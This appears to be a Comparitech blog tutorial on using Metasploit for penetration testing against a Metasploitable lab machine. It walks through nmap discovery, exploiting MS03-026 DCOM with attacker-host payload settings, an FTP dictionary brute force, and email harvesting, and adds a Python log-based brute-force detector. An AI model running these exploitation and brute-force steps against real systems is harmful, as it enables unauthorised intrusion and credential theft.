By Tim Keary, Copywriter, Comparitech

How do you know if your network is safe? Cybercrime is an everyday threat to companies. There is one hacking attack every 39 seconds. Some have turned to antivirus solutions or vulnerability scanners to stay protected, but these tools aren’t enough. Now, you need penetration testing, as well.

Penetration testing enables you to step into the shoes of an attacker and test your network for vulnerabilities. By getting there first, you can fix the issue before an attacker exploits it. Metasploit is one of the top penetration testing tools for simulating attacks. Here are 10 top tips for using Metasploit to harden your network:

  1. Run a discovery scan

Many hackers will go on a reconnaissance effort to gather information on the target before launching an attack. They collect information on the devices you’re using, including the type of operating system. The information gathered is then used later on to find vulnerabilities to break into the network.

Metasploit can be used to run a discovery scan, a combination of a ping scan, port scan, OS/version detection, and a data import. After completing a scan, you will have a list of IPs with information on the services running on the machine.

You can run a Discovery Scan in Metasploit through the command prompt (which uses Nmap commands!). In this example, we’re going to scan a Metasploitable machine. A Metasploitable device is a virtual machine with lots of vulnerabilities.

To run a Discovery Scan, follow the instructions below:

To begin, start the metasploitable machine you want to attack and a Windows Server 2003 machine in metasploitable. Enter the following command (with the machine IP): net addr: IP

Next, start Metasploit. Enter the following command to scan in the specific IP range (in this example we’re using Kali Linux): msf > nmap -sn <IP range>

To find the OS of one of the systems listed, enter the following command with the IP address you want to attack: msf > nmap -sV -O -T4 <target IP>

At the bottom of the output, you will be able to see the OS the machine is running.

  2. Use the Help command to find a list of commands

Knowing what commands you have at your disposal is advantageous when using Metasploit. While you can look online for tutorials to learn new commands, you can also use the Help command to view a list in the Terminal. To view a list of commands, enter the following command:

msf > help

The screen will then show a list of commands with a description. Basic commands like search, use, back, help, info, and exit will help you to make your way around. Once you become more familiar with Metasploit, you can start experimenting with more advanced commands and running payloads!

  3. Run a vulnerability scan

When trying to break into a network, an attacker is looking for a specific vulnerability to exploit. A vulnerability is an entry point that enables an attacker to gain access to a network without authorization. Running a vulnerability scan will highlight these vulnerabilities before an attacker finds them so you can remedy the issue.

You can run vulnerability scans with Metasploit. The commercial version of Metasploit uses Nexpose to run a scan.

First, you need to add the Nexpose console to the Metasploit user interface. You can do this by going to Administration > Global Settings > Nexpose Consoles > Configure a Nexpose Console

Next, enter the IP of the server, port number, user name, and password. Press Enable.

Click Nexpose and add the IP address of the network or host you want to scan.

Select a Scan template to start the scan

Go to Analysis > Host to view the scan results.

  4. Import data from a vulnerability scanner

If you’re using Metasploit, then the chances are you will be using other cybersecurity tools like vulnerability scanners. Metasploit allows you to import scan data from other vulnerability scanning tools for you to examine entry points.

You can import scan data from third-party vulnerability scanners like Nessus, Core, and Impact. These tools show you the weaknesses in your defenses that attackers will try to exploit.

To import data:

Complete a scan in Nmap

Save the scan results in XML format on your desktop

Open Metasploit and enter the following command: msf > db_import “path of xml file”

After completing the import, the prompt will generate a Successfully imported message

  5. Use task chains to schedule scans!

In Metasploit Pro (the paid version of Metasploit), there is a feature called Task Chains that allows you to schedule tasks and complete them automatically. You can use this feature to automatically run scans so that you don’t have to do it manually.

Available tasks include: SCAN, IMPORT, NEXPOSE, BRUTEFORCE, EXPLOIT, MODULE RUN, COLLECT EVIDENCE, CLEANUP, REPORT, and WEB SCAN. To schedule a scan, do the following:

Go to Tasks > Chains > New Task Chain.

Enter a Task Chain Name for the task

Click the + icon under Task Chain Name

Select SCAN from the list of task types

When the task configuration bullet points come up, click on the Schedule Now button

When the schedule table comes up select how often you want to run the task (Once, Hourly, Daily, Weekly, Monthly)

Click the Save button to save the task

  6. Validate vulnerabilities

Whenever you complete a vulnerability scan, you will have discovered the entry points an attacker could exploit. If there are a lot of vulnerabilities, it can be difficult and time-consuming to go through the list and solve each problem one-by-one. To help make things easier, Metasploit provides a feature called Vulnerability Validation Wizard.

The Vulnerability Validation Wizard ranks vulnerabilities in a list based on their risk to your network. Here you can prioritize your response and deal with the greatest risks first.

To use the Vulnerability Validation Wizard follow the instructions:

Open Metasploit Pro Web Console > Project > Vulnerability Validation

When the vulnerability validation page comes up, enter a Project Name and a Description of the project. Press Start

Click on Pull from Nexpose and check the Import existing Nexpose vulnerability data option

Click the Tag tab and check the Automatically Tag by OS option

Click the Exploit tab, check the Clean up sessions when done option under Sessions

Click on the Generate Report tab, select the format you want to use for your report, and the sections you want to use.

Press Start

Once the Validation Wizard comes up, press the Push Validations button at the top right of the page

You can view the results of the tested vulnerabilities by clicking on Home > Project Name > Vulnerabilities. Exploited vulnerabilities will be marked Exploited.

  7. Use exploits to break into a device

After scoping out vulnerabilities and validating them, you are ready to break into a device. To gain access to a device, you can use an exploit, a script designed for compromising a machine. In this example, we’re going to try and exploit FTP:

To begin, enter the following command: msf > use “exploit path”

Enter the show options command to display the parameters you need to configure to run the exploit: msf > show options. RHOST and RPORT will be listed as required. RHOST is the target IP, and RPORT is the target port.

To run the exploit, you will have to set a target IP address and port. Enter the following command:

msf > set RHOST <target IP>

msf > set RPORT 21

Use the run command: msf > run

If a new session starts, then you will have gained access to the system.

  8. Use payloads to interact with the compromised system

Payload is another word for a script that an attacker uses to interact with a compromised system. Attackers will use a payload to upload and execute malicious files onto the victim’s system. There are many different kinds of payloads, and the kind you use depends on the type of vulnerability you intend to exploit.

Attackers will use a payload that matches an exploit they found during an earlier vulnerability scan. For example, if an attacker detects that you’re running a Windows Server 2003 machine, then they could use the DCOM MS03-026 vulnerability to attack you.

To use a payload, follow the instructions below:

Run a search command to look for an exploit or module that is effective at exploiting this vulnerability (in this example, we search for the DCOM vulnerability). Use the exploit with the best rank:  msf > search dcom

Now search for a list of available payloads with the following command: msf exploit (ms03_026_dcom) > show payloads

You will see a ranked list of Compatible Payloads. You want to choose one that allows you to Upload / Execute files or one marked VNC Server (the latter lets you inject a VNC server remotely). Set the payload you want to use: set PAYLOAD payloads /path

Now set the LHOST (attacker IP), LPORT (attacker’s port), RHOST (victim IP), and RPORT (victim port). It should look something like this:

msf exploit (ms03_026_dcom) > set LHOST <attacker IP>
msf exploit (ms03_026_dcom) > set LPORT 23524
msf exploit (ms03_026_dcom) > set RPORT 135
msf exploit (ms03_026_dcom) > set RHOST <target IP>

Enter the following command to start a new session: msf exploit (ms03_026_dcom) > exploit. You can now interact with the machine through the payload’s settings.

  9. Launch a brute force attack

If an attacker has time to hack into your network, then they might try a brute force attack. In a brute force attack, a hacker tries all possible combinations of characters to gain access to a system and its login credentials. You can use Metasploit to simulate a brute force attack.

With Metasploit, you can launch brute force attacks against the metasploitable device in a range of ways, including through FTP, Telnet, and SSH. The medium you use depends on the type of service the system is running. In this section, we’re going to use FTP to attack the metasploitable device.

Create an auxiliary (small script) dictionary list at the root of your Kali machine to break into the metasploitable device.

In this example we will use the auxiliary/scanner/ftp/ftp_login auxiliary to launch the attack: msf > use auxiliary/scanner/ftp/ftp_login

Now set the path of the file that includes the dictionary by entering the following command: msf auxiliary(ftp_login) > set PASS_FILE /root/pass.txt

Then select the target IP: msf auxiliary(ftp_login) > set RHOST <target IP>

Now enter the run command: msf auxiliary(ftp_login) > run. If the attack has been successful, a session will launch. If it isn’t, you will have failed to access the login credentials.
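Running this simulation is also a chance to check that the FTP server's logs expose it. The following added example (not part of the original article) flags clients with a burst of failed FTP logins and records any successful login that follows the burst; the log lines are constructed in the style of vsftpd's log, and the threshold, window and field names are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed log lines in the style of vsftpd's vsftpd.log (not real data).
SAMPLE_LOG = """\
Mon Mar  4 10:15:01 2024 [pid 2101] [admin] FAIL LOGIN: Client "192.0.2.50"
Mon Mar  4 10:15:02 2024 [pid 2102] [admin] FAIL LOGIN: Client "192.0.2.50"
Mon Mar  4 10:15:03 2024 [pid 2103] [root] FAIL LOGIN: Client "192.0.2.50"
Mon Mar  4 10:15:04 2024 [pid 2104] [ftp] FAIL LOGIN: Client "192.0.2.50"
Mon Mar  4 10:15:05 2024 [pid 2105] [svc_ftp] OK LOGIN: Client "192.0.2.50"
Mon Mar  4 10:20:00 2024 [pid 2110] [alice] FAIL LOGIN: Client "192.0.2.77"
Mon Mar  4 10:20:30 2024 [pid 2111] [alice] OK LOGIN: Client "192.0.2.77"
"""

LINE = re.compile(r'^(?P<ts>\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4}) '
                  r'\[pid \d+\] \[(?P<user>[^\]]*)\] '
                  r'(?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"')

def detect(log_text, threshold=4, window=timedelta(seconds=60)):
    """Flag clients with >= threshold failures inside the window and note any
    successful login that follows the burst (a possibly guessed password)."""
    recent = defaultdict(deque)   # ip -> timestamps of recent failures
    alerts = {}                   # ip -> {"failures": n, "login_after_burst": user}
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue              # ignore lines that are not login events
        ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
        q = recent[m["ip"]]
        while q and ts - q[0] > window:
            q.popleft()           # forget failures older than the window
        if m["result"] == "FAIL":
            q.append(ts)
            if len(q) >= threshold:
                entry = alerts.setdefault(
                    m["ip"], {"failures": 0, "login_after_burst": None})
                entry["failures"] = len(q)
        elif m["ip"] in alerts and q:
            alerts[m["ip"]]["login_after_burst"] = m["user"]
    return alerts

if __name__ == "__main__":
    for ip, info in detect(SAMPLE_LOG).items():
        print(ip, info)
```

An alert with `login_after_burst` set is the case to investigate first, since it means the guessing may have worked.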

  10. How to Obtain Email Account Information

Another risk factor that companies have to mitigate is the theft of account data. Cybercriminals are always on the lookout for email accounts to target and gain access to a network before launching an attack. You can use Metasploit to obtain email account information just like an attacker would.

We can collect emails with the search_email collector module:

Load the module by entering the following command: msf > use auxiliary/gather/search_email_collector

Now use the show options command to view the module options: msf > show options

Set a domain to collect data on: msf > set DOMAIN <domain> (Note that Google, Bing, and Yahoo email accounts will be searched for by default). You will then see a list of email addresses that have been “located.”

Test Your Defenses Before Cyber Criminals Do!

Putting your network under pressure with a penetration testing tool like Metasploit enables you to discover new ways to improve your defenses. Periodically addressing vulnerabilities will help to minimize your exposure and keep your network available.

Don’t be afraid to hack into the Metasploitable machine to develop your skills. Just remember that once you’re ready to try live devices, you need to obtain written permission from the owner first!

About the Author

Tim Keary. Since 2017 Tim has been a full-time tech copywriter. Tim writes extensively on net admin topics helping businesses and entrepreneurs to keep their data protected.
